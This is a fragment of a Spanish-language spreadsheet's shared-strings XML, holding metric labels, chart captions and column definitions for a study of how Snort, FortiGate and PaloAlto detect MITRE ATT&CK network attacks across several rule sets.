  </si>
  <si>
    <t>Registros Particulares - Porcentajes Totales (Táctica)</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Totales (Técnica)</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Manual) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Automático) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Automático) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Automático) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque TP (Automático) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales Detectadas RS1 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales Detectadas (Manual) RS2 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales Detectadas (Manual) RS3 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales Detectadas (Manual) RS4 ✔</t>
  </si>
  <si>
    <t>Las gráficas superiores indican en un gráfico de anillo el porcentaje de técnicas con alerta TP (True Positive) para cada uno de los RuleSets o conjuntos de reglas. Para estas gráficas se han considerado todas aquellas técnicas que se consideran detectables mediante patrones y, por tanto, han sido utilizadas en el análisis de detecciones</t>
  </si>
  <si>
    <t>Las gráficas superiores indican en un gráfico de anillo el porcentaje de ataques con alerta TP (True Positive) para cada uno de los RuleSets o conjuntos de reglas. Para estas gráficas se han considerado todos aquellos ataques que se consideran detectables mediante patrones y, por tanto, han sido utilizadas en el análisis de detecciones</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Manual) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Automático) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Automático + Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Automático + Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>% Instancias de Ataque Principales TP (Automático + Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t xml:space="preserve">% Instancias de Ataque Principales TALOS Community Detectadas (Respecto a Total de Instancias) ✔ </t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático) TALOS Community Detectadas (Respecto a Total de Instancias) ✔</t>
  </si>
  <si>
    <t xml:space="preserve">Nº de Instancias de Ataque Principales TALOS Registered Detectadas ✔ (Respecto a Total de Instancias) </t>
  </si>
  <si>
    <t xml:space="preserve">Nº de Instancias de Ataque Principales TALOS Registered (Automático) Detectadas ✔ (Respecto a Total de Instancias) </t>
  </si>
  <si>
    <t xml:space="preserve">
Las gráficas superiores se corresponden con la efectividad de detección de Snort por cada RuleSet o conjunto de reglas utilizadas (RS1, RS2, RS3 y RS4), la efectividad de alertas por táctica clasificada en la matriz MITRE y el porcentaje de FP o falso positivo por RuleSet o conjunto de reglas utilizadas (RS1, RS2, RS3, RS4). Para calcular la efectividad se ha contabilizado, diferenciando por RuleSet y tácticas, las alertas totales generadas por cada uno de los ataques de cada una de las tácticas y las alertas generadas por cada uno de esos ataques que son TP (True Positive), es decir, detectan el ataque realizado. Realizando la división de alertas TP y alertas totales, obtenemos la efectividad de Snort. De la misma manera, para calcular el porcentaje de FP (False Positive) hemos realizado una resta (1 - %efectividad).</t>
  </si>
  <si>
    <t>Registros Totales - Porcentajes Promedios</t>
  </si>
  <si>
    <t xml:space="preserve">% Flujos con Ataque Detectados RS1 ✔ </t>
  </si>
  <si>
    <t xml:space="preserve">% Flujos con Ataque Detectados RS2 ✔ </t>
  </si>
  <si>
    <t xml:space="preserve">% Flujos con Ataque Detectados RS3 ✔ </t>
  </si>
  <si>
    <t xml:space="preserve">% Flujos con Ataque Detectados RS4 ✔ </t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Promedios (Táctica)</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Promedio (Técnica)</t>
  </si>
  <si>
    <t>Flujos RS1</t>
  </si>
  <si>
    <t>Flujos RS2</t>
  </si>
  <si>
    <t>Flujos RS3</t>
  </si>
  <si>
    <t>Flujos RS4</t>
  </si>
  <si>
    <t>Mensajes RS1</t>
  </si>
  <si>
    <t>Mensajes RS2</t>
  </si>
  <si>
    <t>Mensajes RS3</t>
  </si>
  <si>
    <t>Mensajes RS4</t>
  </si>
  <si>
    <t>Instancias RS1</t>
  </si>
  <si>
    <t>Instancias RS2</t>
  </si>
  <si>
    <t>Instancias RS3</t>
  </si>
  <si>
    <t>Instancias RS4</t>
  </si>
  <si>
    <t>Las gráficas superiores muestran dos series relacionadas con las detecciones de Snort para flujos, mensajes e instancias, aplicado a cada uno de los cuatro RuleSets que intervienen en el estudio (Eje X). Las series en color azul muestran la detección basada en contajes totales y en el cálculo del porcentaje para estos valores. Al existir ataques con gran cantidad de flujos, mensajes e instancias, es posible que si Snort no los detecta los resultados se vean comprometidos (afectan negativamente al resto y pueden opacar detecciones satisfactorias). Por ello, se incluye una segunda serie, coloreada en rojo, que realiza los cálculos promedios de las detecciones de cada ataque, evaluando así un porcentaje de detección promedio. La serie azul, por tanto, se puede entender como el número de flujos totales con ataque que han sido detectados respecto al total, mientras que la roja simboliza el porcentaje de detección esperado para un ataque. Adicionalmente se han elaborado de forma automática líneas de tendencia mediante regresión lineal para las series de promedio, que marcan la proporcionalidad existente entre los diferentes valores para cada RuleSet. A partir de éstas se pueden sacar las siguientes conclusiones generales. Para los flujos, un cambio de RuleSet hace variar un 10.7 % la capacidad de detección esperada. Para los mensajes, un cambio de RuleSet hace variar un 11.5 % la capacidad de detección. Para instancias, un cambio de RuleSet hace varíar en un 11.6 % la capacidad de detección esperada. Los coeficientes de regresión para las líneas son, respectivamente, 0.966, 0,976 y 0.978, valores bastante elevados que aportan fiabilidad a las anteriores afirmaciones. Con más detalle, es posible establecer una diferenciación entre los RuleSets 1,2 y 3 respecto al 4. Aparentemente, aunque el RuleSet sigue mejorando las detecciones para flujos, mensajes e instancias, la mejoría es notablemente inferior a la que se produce en los saltos del resto de RuleSets. Por ejemplo, para el caso de las instancias, la variación es de casi un 7%, lejos del 11.6% promedio.</t>
  </si>
  <si>
    <t>Automático</t>
  </si>
  <si>
    <t>Manual</t>
  </si>
  <si>
    <t>Diferencia</t>
  </si>
  <si>
    <t>Caso 1: Flujos RS1</t>
  </si>
  <si>
    <t>Caso 2: Flujos RS2</t>
  </si>
  <si>
    <t>Caso 3: Flujos RS3</t>
  </si>
  <si>
    <t>Caso 4: Flujos RS4</t>
  </si>
  <si>
    <t>Caso 5: Mensajes RS1</t>
  </si>
  <si>
    <t>Caso 6: Mensajes RS2</t>
  </si>
  <si>
    <t>Caso 7: Mensajes RS3</t>
  </si>
  <si>
    <t>Caso 8: Mensajes RS4</t>
  </si>
  <si>
    <t>Caso 9: Instancias RS1</t>
  </si>
  <si>
    <t>Caso 10: Instancias RS2</t>
  </si>
  <si>
    <t>Caso 11: Instancias RS3</t>
  </si>
  <si>
    <t>Caso 12: Instancias RS4</t>
  </si>
  <si>
    <t>Registros Particulares - Valores Absolutos</t>
  </si>
  <si>
    <t>Alertas totales TP (attackids)</t>
  </si>
  <si>
    <t>TOTAL TP (Manual)</t>
  </si>
  <si>
    <t>% TP (Manual)</t>
  </si>
  <si>
    <t>TOTAL FP (Manual)</t>
  </si>
  <si>
    <t>%FP (Manual)</t>
  </si>
  <si>
    <t>TOTAL TP (Automático)</t>
  </si>
  <si>
    <t>% TP (Automático)</t>
  </si>
  <si>
    <t>TOTAL FP (Automático)</t>
  </si>
  <si>
    <t>%FP (Automático)</t>
  </si>
  <si>
    <t>Alertas TP promedio (attackids) por Ataque</t>
  </si>
  <si>
    <t>Efectividad de Alertas (Nº de TP / Alertas Totales)</t>
  </si>
  <si>
    <t xml:space="preserve">% TP </t>
  </si>
  <si>
    <t>TOTAL FP</t>
  </si>
  <si>
    <t>% FP</t>
  </si>
  <si>
    <t>DETECCIONES EFICACES (TP)</t>
  </si>
  <si>
    <t>DETECCIONES EFICACES (TP + Colateral)</t>
  </si>
  <si>
    <t>DETECCIONES POR PROTOCOLO</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados LV1 IPS</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados LV1 APP-CTRL</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados L2 IPS</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados L2 APP-CTRL</t>
  </si>
  <si>
    <t>Nº Casos</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>% Casos</t>
  </si>
  <si>
    <t>% DETECCION ASOCIADO A IPS</t>
  </si>
  <si>
    <t>% DETECCION ASOCIADO A APP-CTRL</t>
  </si>
  <si>
    <t>Nº Total de Flujos Eficazmente Detectados</t>
  </si>
  <si>
    <t>Nº Ataques</t>
  </si>
  <si>
    <t>Flujos con Ataque Totales Detectados ✔</t>
  </si>
  <si>
    <t>Táctica / Concepto</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados LV2 IPS</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados LV2 APP-CTRL</t>
  </si>
  <si>
    <t>% Total Detección Eficaz Flujos</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque Totales Detectados</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque Totales Detectados ✔</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Totales</t>
  </si>
  <si>
    <t xml:space="preserve">1 - % Promedio Detección Eficaz Ataques </t>
  </si>
  <si>
    <t>1 - % Promedio Detección Eficaz Flujos</t>
  </si>
  <si>
    <t>% Flujos con Ataque Totales Detectados ✔</t>
  </si>
  <si>
    <t>1 - % Total Detección Eficaz Flujos</t>
  </si>
  <si>
    <t>RENDIMIENTO PROMEDIO EFICAZ</t>
  </si>
  <si>
    <t>FLUJOS</t>
  </si>
  <si>
    <t>ATAQUES</t>
  </si>
  <si>
    <t>% Flujos con Ataque Totales Detectados</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Promedio</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Promedios</t>
  </si>
  <si>
    <t>Contexto del Ataque</t>
  </si>
  <si>
    <t>CON ALERTA</t>
  </si>
  <si>
    <t>SIN ALERTA</t>
  </si>
  <si>
    <t>Detectados</t>
  </si>
  <si>
    <t>No Detectados</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Flujos LV1</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Ataques LV1</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Flujos LV2</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Ataques LV2</t>
  </si>
  <si>
    <t>FP MANUAL</t>
  </si>
  <si>
    <t>FP AUTOMÁTICO</t>
  </si>
  <si>
    <t>Ataques con 100% Detección ✔</t>
  </si>
  <si>
    <t>Ataques con &lt;100% Detección ✔</t>
  </si>
  <si>
    <t>Ataques con &lt;100% Detección  ✔ sin Alertas</t>
  </si>
  <si>
    <t>Ataques con &lt;100% Detección  ✔ sin Alertas IPS</t>
  </si>
  <si>
    <t>Ataques con &lt;100% Detección  ✔ con Alertas IPS</t>
  </si>
  <si>
    <t>TOTAL TP IPS (Manual)</t>
  </si>
  <si>
    <t>% TP  IPS(Manual)</t>
  </si>
  <si>
    <t>TOTAL FP IPS (Manual)</t>
  </si>
  <si>
    <t>% FP IPS (Manual)</t>
  </si>
  <si>
    <t>CONTROL DE APLICACIONES TP</t>
  </si>
  <si>
    <t>% FP CONTROL DE APLICACIONES (Automático)</t>
  </si>
  <si>
    <t>% FP CONTROL DE APLICACIONES (Manual)</t>
  </si>
  <si>
    <t>TOTAL TP IPS (Automático)</t>
  </si>
  <si>
    <t>% TP IPS (Automático)</t>
  </si>
  <si>
    <t>% FP IPS (Automático)</t>
  </si>
  <si>
    <t>Alertas TP IPS promedio (attackids) por Ataque</t>
  </si>
  <si>
    <t>% TP IPS</t>
  </si>
  <si>
    <t xml:space="preserve">TOTAL FP </t>
  </si>
  <si>
    <t>% FP IPS</t>
  </si>
  <si>
    <t>TOTAL TP CONTROL DE APLICACIONES</t>
  </si>
  <si>
    <t>% FP CONTROL DE APLICACIONES</t>
  </si>
  <si>
    <t xml:space="preserve">% FP IPS </t>
  </si>
  <si>
    <t>TOTAL ALERTAS adaptacion grafica</t>
  </si>
  <si>
    <t>Categorización de Ataques - L1 vs L2</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados L1 IPS</t>
  </si>
  <si>
    <t>% Promedio Flujos TP Detectados L1 APP-CTRL</t>
  </si>
  <si>
    <t>-%</t>
  </si>
  <si>
    <t>RENDIMIENTO OBTENIDO ANALIZANDO SOLO LA PARTE DE IPS DE PALOALTO</t>
  </si>
  <si>
    <t>No detectados</t>
  </si>
  <si>
    <t>FP Manual IPS</t>
  </si>
  <si>
    <t>FP Manual Control Aplicaciones</t>
  </si>
  <si>
    <t>Registros de Detecciones</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección de Flujos - General</t>
  </si>
  <si>
    <t>Comparación Snort vs PA - Detección de Flujos - General</t>
  </si>
  <si>
    <t>Nº de Tácticas</t>
  </si>
  <si>
    <t>Nº de Técnicas</t>
  </si>
  <si>
    <t>Nº de Subtécnicas</t>
  </si>
  <si>
    <t>Nº de Ataques</t>
  </si>
  <si>
    <t>Snort (RS4)</t>
  </si>
  <si>
    <t>Snort (RS3)</t>
  </si>
  <si>
    <t>Snort (RS2)</t>
  </si>
  <si>
    <t>Snort (RS1)</t>
  </si>
  <si>
    <t>FG</t>
  </si>
  <si>
    <t>PA</t>
  </si>
  <si>
    <t>Comparación Snort RS4 vs FG/PA - FP Procedimiento Manual</t>
  </si>
  <si>
    <t>Comparación Snort RS4 vs FG/PA - TP Procedimiento Manual</t>
  </si>
  <si>
    <t>Número de Flujos con Ataque Detectados ✔ (Total)</t>
  </si>
  <si>
    <t>Snort RS4</t>
  </si>
  <si>
    <t>Fortigate</t>
  </si>
  <si>
    <t>% Detección de Flujos con Ataque ✔ (Total)</t>
  </si>
  <si>
    <t>% Detección de Flujos con Ataque ✔ (Promedio)</t>
  </si>
  <si>
    <t>% Flujos con Ataque Totales Detectados FORTIGATE</t>
  </si>
  <si>
    <t>% Flujos con Ataque Totales Detectados PaloAlto</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados SNORT</t>
  </si>
  <si>
    <t>Nº Técnicas Implementadas</t>
  </si>
  <si>
    <t>Nº Subtécnicas Implementadas</t>
  </si>
  <si>
    <t>Nº Ataques Implementados</t>
  </si>
  <si>
    <t>Flujos con Ataque Totales Detectados PaloAlto</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados Snort</t>
  </si>
  <si>
    <t>Comparación Snort vs FG/PA - FP Procedimiento Automático</t>
  </si>
  <si>
    <t>Comparación Snort vs FG/PA - TP Procedimiento Automático</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección de Flujos - Tácticas (Promedio)</t>
  </si>
  <si>
    <t>Comparación Snort vs PA - Detección de Flujos - Tácticas (Promedio)</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección de Flujos - Técnicas (Promedio)</t>
  </si>
  <si>
    <t>Comparación Snort vs PA - Detección de Flujos - Técnicas (Promedio)</t>
  </si>
  <si>
    <t>Snort</t>
  </si>
  <si>
    <t>FG = Snort</t>
  </si>
  <si>
    <t>Snort &gt; FG</t>
  </si>
  <si>
    <t>FG &gt; Snort</t>
  </si>
  <si>
    <t>PA = Snort</t>
  </si>
  <si>
    <t>Snort &gt; PA</t>
  </si>
  <si>
    <t>PA &gt; Snort</t>
  </si>
  <si>
    <t>PA = Fortigate</t>
  </si>
  <si>
    <t>Fortigate &gt; PA</t>
  </si>
  <si>
    <t>PA &gt; Fortigate</t>
  </si>
  <si>
    <t>Dentro de las 14 tácticas incluidas en el estudio, las tácticas Command and Control, Impact, Defense Evasion y Credential Access son las que más veces se han implementado (englobando todos los enfoques de implementación, basado en técnicas, subtécnicas y ataques). Por el contrario, Privilege Escalation es la táctica con menos implementaciones del estudio. Esto aporta una visión general acerca de la naturaleza de las tácticas. Se puede concluir, por ejemplo, que tácticas como Command and Control tienen muchas variantes y la mayor parte de ellas hacen uso de una red, por lo que su análisis con IDS resulta factible. Sin embargo, tácticas como Privilege Escalation, más orientadas a una ejecución local sin necesidad de interactuar con una red entre equipos, son menos relevantes para un estudio de capacidad de detección de un IDS. Hay que añadir el matiz de que el número de técnicas y subtécnicas de cada táctica afecta en gran medida a los resultados generales, por lo que hay que tener en cuenta este detalle a la hora de valorar si una táctica es más o menos relevante para el estudio</t>
  </si>
  <si>
    <t>Categorización de Ataques - LV1 vs LV2</t>
  </si>
  <si>
    <t>Nº de Ataques LV1</t>
  </si>
  <si>
    <t>Nº de Ataques LV2</t>
  </si>
  <si>
    <t>Nº de Ataques LV1 ✔</t>
  </si>
  <si>
    <t>Nº de Ataques LV2 ✔</t>
  </si>
  <si>
    <t>% de Ataques LV1</t>
  </si>
  <si>
    <t>% de Ataques LV2</t>
  </si>
  <si>
    <t>Implementación de Ataques</t>
  </si>
  <si>
    <t>Nº de Tácticas Detectables por Red</t>
  </si>
  <si>
    <t>% Tácticas Detectables por Red Implementadas</t>
  </si>
  <si>
    <t>Nº de Tácticas Detectables por Red Implementadas</t>
  </si>
  <si>
    <t>% Técnicas Detectables por Red Implementadas</t>
  </si>
  <si>
    <t>Nº Técnicas Detectables por Red</t>
  </si>
  <si>
    <t>% Subtécnicas Detectables por Red Implementadas</t>
  </si>
  <si>
    <t>Nº Total Técnicas Detectables por Red Implementadas</t>
  </si>
  <si>
    <t>% Tácticas Detectables por Red No Implementadas</t>
  </si>
  <si>
    <t>Nº Total de Subtécnicas Detectables por Red</t>
  </si>
  <si>
    <t>% Técnicas Detectables por Red No Implementadas</t>
  </si>
  <si>
    <t>Nº Total de Subtécnicas Detectables por Red Implementadas</t>
  </si>
  <si>
    <t>% Subtécnicas Detectables por Red No Implementadas</t>
  </si>
  <si>
    <t>Detección de Snort &gt; Detección de FG</t>
  </si>
  <si>
    <t>Detección de Snort &gt; Detección de PA</t>
  </si>
  <si>
    <t>Detección de Fortigate &gt; Detección de PA</t>
  </si>
  <si>
    <t>Detección de Snort = Detección de FG</t>
  </si>
  <si>
    <t>Detección de Snort = Detección de PA</t>
  </si>
  <si>
    <t>Detección de Fortigate = Detección de Paloalto</t>
  </si>
  <si>
    <t>Detección de Snort &lt; Detección de FG</t>
  </si>
  <si>
    <t>Detección de Snort &lt; Detección de PA</t>
  </si>
  <si>
    <t>Detección de Fortigate &lt; Detección de PaloAlto</t>
  </si>
  <si>
    <t>No Comparables</t>
  </si>
  <si>
    <t>No comparables</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección Eficaz de Flujos - General (Promedio)</t>
  </si>
  <si>
    <t>Snort - RS1</t>
  </si>
  <si>
    <t>Snort - RS2</t>
  </si>
  <si>
    <t>Snort - RS3</t>
  </si>
  <si>
    <t>Snort - RS4</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección Eficaz de Flujos - Tácticas (Promedio)</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección Eficaz de Ataques - General (Promedio)</t>
  </si>
  <si>
    <t>Comparación Snort vs FG - Detección Eficaz de Ataques - Tácticas (Promedio)</t>
  </si>
  <si>
    <t>Diferencia (FG-Snort)</t>
  </si>
  <si>
    <t>Diferencia (PA-Snort)</t>
  </si>
  <si>
    <t>DIFERENCIA MEDIA</t>
  </si>
  <si>
    <t>Comparación Rendimientos</t>
  </si>
  <si>
    <t>IDS</t>
  </si>
  <si>
    <t>Rendimiento</t>
  </si>
  <si>
    <t>Comparación Varios Parámetros (Detección Eficaz Ataques)</t>
  </si>
  <si>
    <t>Capacidad de Detección (%)</t>
  </si>
  <si>
    <t>Rendimiento (%)</t>
  </si>
  <si>
    <t>Capacidad de Detección</t>
  </si>
  <si>
    <t>FP</t>
  </si>
  <si>
    <t>Efectividad de Alertas</t>
  </si>
  <si>
    <t>LEYENDA PROCEDENCIA DE PCAPS (Manual [n])</t>
  </si>
  <si>
    <t>Referencia</t>
  </si>
  <si>
    <t>Título</t>
  </si>
  <si>
    <t>Autor</t>
  </si>
  <si>
    <t>URL Acceso</t>
  </si>
  <si>
    <t>Seguridad en conmutadores de red y puntos de acceso. Clasificación y realización práctica de ataques</t>
  </si>
  <si>
    <t>Javier García Clavero</t>
  </si>
  <si>
    <t>https://idus.us.es/items/88bc3f70-881a-4b0a-982e-3d60d0a07d65</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red del IDS Snort bajo la matriz MITRE ATT&amp;CK mediante Caldera</t>
  </si>
  <si>
    <t>Javier Fructuoso Martín</t>
  </si>
  <si>
    <t>https://idus.us.es/handle/11441/143609</t>
  </si>
  <si>
    <t>Detección en fase temprana de ciberataques con rastro en red</t>
  </si>
  <si>
    <t>Andrés García Coronado</t>
  </si>
  <si>
    <t>https://biblus.us.es/bibing/proyectos/abreproy/94340/fichero/TFG-4340+GARC%C3%8DA+CORONADO%2C+ANDR%C3%89S.pdf</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red mediante los IDS Snort y FortiGate</t>
  </si>
  <si>
    <t>Javier García Borja</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red mediante los IDS Snort y PaloAlto</t>
  </si>
  <si>
    <t>Alejandro Moreno Pérez</t>
  </si>
  <si>
    <t>LEYENDA PROCEDENCIA DE PCAPS (Otros)</t>
  </si>
  <si>
    <t>Dataset-CIC-2018</t>
  </si>
  <si>
    <t>UNB - CIC</t>
  </si>
  <si>
    <t>https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t>(A.1) - REGLAS USADAS</t>
  </si>
  <si>
    <t>Tablas de IDS</t>
  </si>
  <si>
    <t>cada una de las tablas resume las versiones, fechas y características principales de los elementos que conforman las reglas de los IDS del estudio</t>
  </si>
  <si>
    <t>estas tablas especifican los valores de configuración de los IDS, como los umbrales de las alertas de Fuerza Bruta o Denegación de Servicio</t>
  </si>
  <si>
    <t>(B) - DETECCIONES ATAQUE</t>
  </si>
  <si>
    <t>Nº DE FLUJOS CON ATAQUE/S COLATERALES</t>
  </si>
  <si>
    <t>Nº Total de Alertas TP (Automático)</t>
  </si>
  <si>
    <t>Nº Total de Alertas (Manual)</t>
  </si>
  <si>
    <t>Attackids FP(Automático)</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR FORTIGATE - TOTAL</t>
  </si>
  <si>
    <t>Nº FLUJOS CON ATAQUE DETECTADOS POR PALOALTO</t>
  </si>
  <si>
    <t>táctica a la que pertenece el ataque</t>
  </si>
  <si>
    <t>resto de tácticas a las que también pertenece el ataque</t>
  </si>
  <si>
    <t>ID de la táctica a la que pertenece el ataque</t>
  </si>
  <si>
    <t>técnica a la que pertenece el ataque</t>
  </si>
  <si>
    <t>ID de la técnica a la que pertenece el ataque</t>
  </si>
  <si>
    <t>subtécnica a la que pertenece el ataque (puede no tener subtécnica asociada)</t>
  </si>
  <si>
    <t>ID de la subtécnica a la que pertenece el ataque (puede no tener subtécnica asociada)</t>
  </si>
  <si>
    <t xml:space="preserve"> resumen breve del objetivo del ataque</t>
  </si>
  <si>
    <t xml:space="preserve"> herramienta/s empleadas para la implementación del ataque</t>
  </si>
  <si>
    <t>nombre del fichero PCAP que recoge los paquetes generados durante la implementación del ataque</t>
  </si>
  <si>
    <t>número total de flujos en el fichero pcap. Calculado haciendo uso de la herramienta tranalyzer, descartando aquellos flujos que no tienen una Cabecera asociada (descartando así la mayoría de flujos de capa &lt;L3)</t>
  </si>
  <si>
    <t xml:space="preserve"> número de flujos que contienen paquetes vinculados al ataque implementado</t>
  </si>
  <si>
    <t>número total de flujos que contienen ataques colaterales</t>
  </si>
  <si>
    <t>número de mensajes/paquetes que contienen al ataque implementado o parte de él.</t>
  </si>
  <si>
    <t>número total de instancias de ataque principales y colaterales. Una instancia es la unidad mínima de un ataque, pudiéndose tratar, por ejemplo, de un comando, una inyección SQL o un escaneo a un puerto concreto</t>
  </si>
  <si>
    <t>número de instancias de ataque en la captura de paquetes</t>
  </si>
  <si>
    <t>número de instancias en la captura de paquetes que constituyen amenaza y pueden generar alertas pero no están relacionadas con el propio ataque en sí.</t>
  </si>
  <si>
    <t>explicación del ataque colateral, de qué se trata y a qué técnica de la matriz MITRE pertenece</t>
  </si>
  <si>
    <t>SI o NO en función de si el ataque puede o podría ser detectado por patrones por un IDS</t>
  </si>
  <si>
    <t>define el mecanismo usado o que podría usarse para detectar satisfactoriamente el ataque</t>
  </si>
  <si>
    <t xml:space="preserve"> descripción más extensa del proceso de implementación del ataque. Opcional</t>
  </si>
  <si>
    <t>contiene una referencia donde poder consultar detalladamente el proceso de generación del pcap</t>
  </si>
  <si>
    <t>contiene una referencia donde poder consultar detalladamente la validación del pcap, analizando los paquetes y comprobando que el ataque verdaderamente se encuentra correctamente capturado</t>
  </si>
  <si>
    <t>contiene una referencia donde poder consultar detalladamente el análisis de detecciones del pcap para el IDS Snort</t>
  </si>
  <si>
    <t>✔ o ✘ en función de si la captura del ataque tiene formato .pcapng</t>
  </si>
  <si>
    <t>SI o NO (con matices) dependiendo de si el ataque es detectable por un IDS</t>
  </si>
  <si>
    <t>✔ o ✘ en función de si la captura de paquetes contiene ataques colaterales</t>
  </si>
  <si>
    <t xml:space="preserve"> ✔ o ✘ en función de si la captura de paquetes ha sufrido el ajuste de MTU para los entornos de los IDS</t>
  </si>
  <si>
    <t>✔ o ✘ en función de si la captura de paquetes ha devuelto errores en la reproducción de paquetes dentro de los entornos de los IDS</t>
  </si>
  <si>
    <t xml:space="preserve"> ✔ o ✘ en función de si la captura de paquetes tan sólo contiene flujos completos, es decir, no incluye flujos truncados</t>
  </si>
  <si>
    <t>LV1 o LV2 dependiendo de la categoría del ataque. Un ataque que puede interpretarse como una acción legítima en ciertos contextos pertenecerá a la categoría LV2. Si este caso hipotético no puede darse (el ataque siempre es ataque) será LV1</t>
  </si>
  <si>
    <t>explicación de por qué el ataque se categoriza como un ataque L1 o L2</t>
  </si>
  <si>
    <t>L3 si el ataque se apoya, como mínimo, en la capa 3 del modelo OSI o L2 si lo hace por debajo, es decir, a nivel de Switch, WiFi o algún protocolo de enlace</t>
  </si>
  <si>
    <t>para cada RS de Snort, esta sección enumera los SIDs de las alertas devueltos por Snort para el RuleSet correspondiente</t>
  </si>
  <si>
    <t xml:space="preserve"> para cada RS de Snort, número de SIDs diferentes de las alertas devueltos por Snort para el RuleSet correspondiente</t>
  </si>
  <si>
    <t>para cada RS de Snort, número total de alertas (con repetición) generadas por Snort para el RuleSet correspondiente.</t>
  </si>
  <si>
    <t>para cada RS de Snort, SIDs que aparecen tanto en las detecciones de tráfico legítimo como en el propio ataque, equivalente a decir que los SIDs que aparecen en esta columna son los SIDs calificados como FP en el método de identificación de alertas automático</t>
  </si>
  <si>
    <t xml:space="preserve"> para cada RS de Snort, SIDs que sólo aparecen en las detecciones del ataque, equivalente a decir que los SIDs que aparecen en esta coluimna son todos los SIDs considerados como TP en el método de identificación de alertas automático</t>
  </si>
  <si>
    <t>para cada RS de Snort, nº de SIDs diferentes que han sido calificados como TP para el método automático de identificación de alertas</t>
  </si>
  <si>
    <t>para cada RS de Snort, nº total de alertas TP generadas, atendiendo al procedimiento automático de identificación de alertas</t>
  </si>
  <si>
    <t>para cada RS de Snort, SIDs que manualmente han sido calificados como FP, ya sea por tratarse de simples eventos de red o por no estar relacionados</t>
  </si>
  <si>
    <t>para cada RS de Snort, SIDs que aparecen en tráfico legítimo y que se usan para la metodología automática para calificar los SIDs del ataque como FP</t>
  </si>
  <si>
    <t>para cada RS de Snort, contendrá los SIDs de la columna "SIDs FP (Manual)" si esta no es igual a "-". En tal caso (no se ha realizado el análisis manual) contendrá los SIDs de la columna "SIDs FP (Automático)"</t>
  </si>
  <si>
    <t>para cada RS de Snort, contendrá los SIDs que han sido considerados de forma manual como No Relacionados</t>
  </si>
  <si>
    <t>para cada RS de Snort, contendrá los SIDs que han sido considerados de forma manual como Eventos de Red</t>
  </si>
  <si>
    <t xml:space="preserve"> para cada RS de Snort, SIDs que manualmente se ha comprobado que siempre son TP</t>
  </si>
  <si>
    <t>para cada RS de Snort, SIDs que manualmente se ha comprobado que en ocasiones son TP y en otras FP</t>
  </si>
  <si>
    <t>para cada RS de Snort, nº de SIDs diferentes que han sido calificados como TP para el método manual de identificación de alertas</t>
  </si>
  <si>
    <t>para cada RS de Snort, nº total de alertas TP generadas, atendiendo al procedimiento manual de identificación de alertas</t>
  </si>
  <si>
    <t>para el RS1 y RS3, número de flujos totales analizados por Snortv3</t>
  </si>
  <si>
    <t>para cada RS de Snort, número de flujos con ataque detectados por el RuleSet. Para este cálculo, se cuenta el número de flujos totales dentro de los logs de alertas</t>
  </si>
  <si>
